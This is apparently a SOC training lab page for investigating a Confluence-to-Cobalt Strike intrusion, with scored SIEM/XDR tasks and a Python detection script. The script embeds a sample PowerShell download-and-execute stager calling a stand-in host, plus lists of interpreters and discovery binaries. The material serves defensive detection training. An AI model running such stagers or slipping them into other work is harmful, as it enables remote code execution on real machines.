
Cobalt Strike: Beacon Detection
Analyze a sophisticated intrusion involving the exploitation of an Atlassian Confluence server, leading to Cobalt Strike beacon deployment and LockBit ransomware. This scenario focuses on identifying malleable C2 profiles, process injection into legitimate Windows processes, and the use of SOCKS proxies for lateral movement. You will navigate through SIEM logs and XDR process trees to reconstruct the attack timeline from initial access to final impact.
Investigation Tasks
Complete each task by investigating alerts and submitting your findings.
Identifying Malicious Scripting Behavior (50 points)
An alert was triggered on wkstn-05 involving the user jdoe, suggesting the execution of an encoded command-line script. You must investigate the telemetry to determine how the attacker leveraged native scripting interpreters to gain further access.
Identifying the Compromised Service Account (15 points)
An unusual execution chain was detected on the confluence-srv host around 2025-04-10T14:25:29.697Z. You need to determine which service account was utilized to run these commands to assess the scope of the account compromise.
Identifying the Malicious Scripting Engine (50 points)
An alert was triggered indicating a suspicious process spawned from a browser on wkstn-05. You need to investigate the SIEM logs to determine which process was used to execute the obfuscated script that initiated the connection to the external C2 server.
Identify Suspicious Command and Control Infrastructure (15 points)
An alert was triggered indicating a possible data exfiltration attempt from our internal network. Analyze the XDR timeline to determine which internal endpoint or domain was being targeted during the peak of the suspicious activity.
Identifying the Incident Log Origin (35 points)
An unusual outbound connection was flagged coming from the confluence-srv host during a potential data exfiltration attempt. You need to determine which architectural component or log source was responsible for reporting this specific activity to our central monitoring system.
Investigate Post-Exploitation Discovery Commands (50 points)
After gaining initial access to wkstn-05, the threat actor began performing local reconnaissance to identify the current user context. Analyze the SIEM logs for this workstation to determine which native Windows binary was invoked to verify their privileges.
Identifying Successful Authentication Patterns (50 points)
At 2025-04-10T08:15:00.958Z, an unusual volume of authentication activity was observed originating from wkstn-05. You need to determine the exact event identifier that confirms a successful session was established on the domain controller to map out the attacker's lateral movement.
Identifying the Initial Vector on confluence-srv (50 points)
An alert was triggered on the confluence-srv host involving the service account confluence_svc. You need to determine how the attacker first gained a foothold by reviewing the automated mapping of the detected activity to the MITRE ATT&CK framework within the XDR telemetry.
8 tasks · 315 points total
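The scripting tasks above (an encoded command line, an interpreter spawned from a browser, a discovery binary run to check privileges) are all answered from process-creation telemetry. The following Python triage pass is an added example, not code from the lab or its platform, of the logic an analyst could run over such records: it decodes a PowerShell -EncodedCommand argument back to the script it carries (base64 over UTF-16LE, which is what powershell.exe expects), flags a script interpreter whose parent is a browser, and flags common discovery binaries. The events, the stager text and its URL are constructed for the example; the field names loosely follow Sysmon Event ID 1 and are an assumption, not the lab's schema.

```python
"""Triage constructed process-creation telemetry for Cobalt Strike-style scripting activity.

Added example; the events below are constructed for illustration and are not the lab's data.
Field names loosely follow Sysmon Event ID 1 (process creation) and are an assumption.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Hypothetical one-line stager a dropper might run; the URL is made up (.invalid TLD).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"


def encode_powershell(script: str) -> str:
    """Build the argument powershell.exe -EncodedCommand expects: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample chain: browser -> wscript -> encoded PowerShell -> whoami, plus one benign event.
SAMPLE_EVENTS = [
    {"host": "wkstn-05", "user": "jdoe",
     "parent_image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wscript.exe //B //E:JScript C:\Users\jdoe\AppData\Local\Temp\update.js"},
    {"host": "wkstn-05", "user": "jdoe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGER)},
    {"host": "wkstn-05", "user": "jdoe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\whoami.exe",
     "command_line": "whoami /priv"},
    {"host": "wkstn-05", "user": "jdoe",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
]

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "brave.exe"}
SCRIPT_INTERPRETERS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
                       "pwsh.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
DISCOVERY_BINARIES = {"whoami.exe", "net.exe", "net1.exe", "nltest.exe", "ipconfig.exe",
                      "systeminfo.exe", "tasklist.exe", "quser.exe", "klist.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (and -ec); match them all.
_ENC_FLAGS = "|".join(["ec"] + ["encodedcommand"[:i] for i in range(1, 15)])
_ENC_RE = re.compile(rf"(?:^|\s)[-/](?:{_ENC_FLAGS})\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script if the command line carries a valid -EncodedCommand payload."""
    m = _ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # a -e... flag followed by something that is not a real payload


@dataclass
class Finding:
    host: str
    user: str
    image: str
    parent_image: str
    reasons: List[str] = field(default_factory=list)
    decoded_script: Optional[str] = None


def triage(events) -> List[Finding]:
    """Flag events matching the scenario's scripting patterns, preserving timeline order."""
    findings = []
    for ev in events:
        image, parent = basename(ev["image"]), basename(ev["parent_image"])
        f = Finding(ev["host"], ev["user"], image, parent)
        if parent in BROWSERS and image in SCRIPT_INTERPRETERS:
            f.reasons.append(f"script interpreter {image} spawned by browser {parent}")
        decoded = decode_encoded_command(ev["command_line"])
        if decoded is not None:
            f.decoded_script = decoded
            f.reasons.append("encoded PowerShell command decoded from command line")
        if image in DISCOVERY_BINARIES:
            f.reasons.append(f"local discovery via {image}")
        if f.reasons:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host} {f.user} {f.parent_image} -> {f.image}: {'; '.join(f.reasons)}")
        if f.decoded_script:
            print("   decoded:", f.decoded_script)
```

Validating the base64 and the UTF-16LE decode before reporting is deliberate: a bare `-e` prefix also matches `-ExecutionPolicy`, and a detection that trusts the flag alone without decoding the payload will both false-positive on benign invocations and miss what the attacker actually ran.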
Skills You'll Build
Requires foundational alert triage skills; you will correlate multiple data sources (SIEM logs and XDR process trees) to reconstruct the attack timeline.
Prerequisites
- Basic understanding of security alerts
- Familiarity with SIEM concepts
- Familiarity with XDR concepts
More Operations
ClickFix: The Fake CAPTCHA Trap
Investigate a modern 'ClickFix' social engineering attack where a user was tricked into executing a malicious PowerShell command via a fake CAPTCHA interface. You will analyze SIEM and XDR telemetry to trace the infection from the initial web lure to the deployment of an infostealer.
Phishing Investigation: ZipLine Supply Chain Campaign
Investigate a sophisticated social engineering campaign targeting manufacturing supply chains. You will analyze a 'reversed' phishing flow where attackers use 'Contact Us' forms to trick employees into initiating email conversations, leading to the deployment of the custom MixShell in-memory implant via DNS tunneling.
Credential Harvesting: The Lookalike Login
An investigation into a modern phishing campaign targeting critical infrastructure. You will analyze email headers for domain spoofing, identify 'Paste and Run' execution chains, and track the delivery of the LummaC2 information stealer through SIEM logs.